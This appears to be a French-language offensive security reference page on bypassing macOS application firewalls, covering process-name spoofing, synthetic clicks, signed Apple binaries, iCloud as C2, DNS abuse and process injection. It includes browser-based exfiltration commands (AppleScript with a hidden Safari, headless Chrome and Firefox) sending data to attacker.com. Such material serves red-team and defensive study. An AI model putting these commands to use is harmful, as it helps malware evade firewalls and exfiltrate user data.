Techniques trouvées

Les techniques suivantes ont été trouvées fonctionnant dans certaines applications pare-feu macOS.

Abus des noms de liste blanche

• Par exemple, appeler le logiciel malveillant avec des noms de processus macOS bien connus comme launchd

Clic synthétique

• Si le pare-feu demande la permission à l'utilisateur, faire en sorte que le logiciel malveillant clique sur Autoriser

Utiliser des binaires signés par Apple

• Comme curl, mais aussi d'autres comme whois

Domaines Apple bien connus

Le pare-feu pourrait autoriser les connexions vers des domaines Apple bien connus tels que apple.com ou icloud.com. Et iCloud pourrait être utilisé comme un C2.

Contournement générique

Quelques idées pour essayer de contourner les pare-feu

Vérifier le trafic autorisé

Connaître le trafic autorisé vous aidera à identifier les domaines potentiellement en liste blanche ou les applications autorisées à y accéder

lsof -i TCP -sTCP:ESTABLISHED

Abus de DNS

Les résolutions DNS sont effectuées via l'application signée mdnsreponder qui sera probablement autorisée à contacter les serveurs DNS.

Via les applications du navigateur

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Via processes injections

Si vous pouvez injecter du code dans un processus autorisé à se connecter à n'importe quel serveur, vous pourriez contourner les protections du pare-feu :

Références

• https://www.youtube.com/watch?v=UlT5KFTMn2k